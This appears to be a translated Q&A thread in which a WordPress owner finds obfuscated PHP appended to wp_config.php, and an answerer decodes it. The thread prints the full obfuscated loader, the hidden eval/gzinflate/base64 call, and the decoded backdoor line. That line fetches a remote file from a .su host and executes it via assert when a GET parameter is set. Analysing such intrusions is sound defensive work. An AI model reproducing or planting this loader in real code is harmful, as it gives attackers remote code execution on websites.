wp_config.php文件中的可疑代码

时间:2016-10-10 19:24:01

标签: php wordpress security

我猜我的页面已经被黑了,因为在我的wp_config.php文件中我在最后一个通道上找到了这段代码。

$Xbk = "uQoCwSNBIpmVRP14XjL56=AWfl.DFrv03tx;Ez*bnaHKdyc(UsMi+qgk87'9eZYT_/)OG2hJ";$vDE = $Xbk[41].$Xbk[49].$Xbk[49].$Xbk[60].$Xbk[29].$Xbk[33];$uQI = $Xbk[60].$Xbk[30].$Xbk[41].$Xbk[25].$Xbk[47].$Xbk[54].$Xbk[37].$Xbk[51].$Xbk[40].$Xbk[24].$Xbk[25].$Xbk[41].$Xbk[33].$Xbk[60].$Xbk[47].$Xbk[39].$Xbk[41].$Xbk[49].$Xbk[60].$Xbk[20].$Xbk[15].$Xbk[64].$Xbk[44].$Xbk[60].$Xbk[46].$Xbk[2].$Xbk[44].$Xbk[60].$Xbk[47];$T4q = $Xbk[66].$Xbk[66].$Xbk[66].$Xbk[35];$R1h = $uQI.$Xbk[58].$Xbk[7].$Xbk[46].$Xbk[28].$Xbk[18].$Xbk[3].$Xbk[2].$Xbk[50].$Xbk[4].$Xbk[36].$Xbk[22].$Xbk[27].$Xbk[1].$Xbk[53].$Xbk[57].$Xbk[1].$Xbk[5].$Xbk[50].$Xbk[6].$Xbk[55].$Xbk[15].$Xbk[31].$Xbk[18].$Xbk[53].$Xbk[1].$Xbk[5].$Xbk[49].$Xbk[28].$Xbk[6].$Xbk[56].$Xbk[1].$Xbk[18].$Xbk[0].$Xbk[5].$Xbk[54].$Xbk[40].$Xbk[68].$Xbk[17].$Xbk[6].$Xbk[52].$Xbk[62].$Xbk[12].$Xbk[68].$Xbk[46].$Xbk[43].$Xbk[25].$Xbk[33].$Xbk[43].$Xbk[57].$Xbk[59].$Xbk[57].$Xbk[69].$Xbk[9].$Xbk[13].$Xbk[56].$Xbk[55].$Xbk[37].$Xbk[29].$Xbk[9].$Xbk[36].$Xbk[65].$Xbk[48].$Xbk[0].$Xbk[17].$Xbk[20].$Xbk[31].$Xbk[63].$Xbk[37].$Xbk[63].$Xbk[31].$Xbk[50].$Xbk[16].$Xbk[31].$Xbk[9].$Xbk[44].$Xbk[12].$Xbk[16].$Xbk[10].$Xbk[42].$Xbk[30].$Xbk[11].$Xbk[63].$Xbk[4].$Xbk[57].$Xbk[14].$Xbk[54].$Xbk[43].$Xbk[45].$Xbk[57].$Xbk[15].$Xbk[7].$Xbk[55].$Xbk[59].$Xbk[55].$Xbk[31].$Xbk[34].$Xbk[68].$Xbk[19].$Xbk[40].$Xbk[54].$Xbk[27].$Xbk[49].$Xbk[50].$Xbk[13].$Xbk[5].$Xbk[55].$Xbk[51].$Xbk[50].$Xbk[57].$Xbk[61].$Xbk[30].$Xbk[5].$Xbk[68].$Xbk[20].$Xbk[31].$Xbk[43].$Xbk[42].$Xbk[59].$Xbk[39].$Xbk[70].$Xbk[0].$Xbk[60].$Xbk[1].$Xbk[19].$Xbk[28].$Xbk[0].$Xbk[50].$Xbk[37].$Xbk[54].$Xbk[50].$Xbk[7].$Xbk[61].$Xbk[54].$Xbk[50].$Xbk[17].$Xbk[15].$Xbk[15].$Xbk[48].$Xbk[23].$Xbk[16].$Xbk[11].$Xbk[36].$Xbk[0].$Xbk[42].$Xbk[67].$Xbk[48].$Xbk[70].$Xbk[70].$Xbk[11].$Xbk[65].$Xbk[30].$Xbk[15].$Xbk[21].$Xbk[58].$T4q;@$vDE($R1h);

我想这是某种base64,但如果有人可以帮我解密,我将不胜感激。

1 个答案:

答案 0 :(得分:1)

(来自http://sandbox.onlinephpfunctions.com/code/895dca3aff76c35e4e16b0c5d0a90838eb1054f6

执行的代码是:

eval(gzinflate(base64_decode('BcFLCoMwEADQq7QSMNk40LqQSsFN8QLuSgnGjN+YRGcKltK7972pP8kzrpE/Uuj60TzT0MX0pdRXmHvVTw71gKy74Bk9k0xG5ngDsMPSkiM7ZvSG60KH9bhueQ5FuMzgMBZgMj44UWXVEuHOUhhV/v4=')));

用echo:

替换eval
echo(gzinflate(base64_decode('BcFLCoMwEADQq7QSMNk40LqQSsFN8QLuSgnGjN+YRGcKltK7972pP8kzrpE/Uuj60TzT0MX0pdRXmHvVTw71gKy74Bk9k0xG5ngDsMPSkiM7ZvSG60KH9bhueQ5FuMzgMBZgMj44UWXVEuHOUhhV/v4=')));

,结果是:

if (!empty($_GET['ocp'])){$b=@file_get_contents("http://dgkaslsdh.su/3ksxdnemq44/8o2j/lep8/b.txt");@assert($b);}

因此它尝试下载文件并assert。不过,如果您尝试从上面的链接获取文件,至少此处服务器已关闭。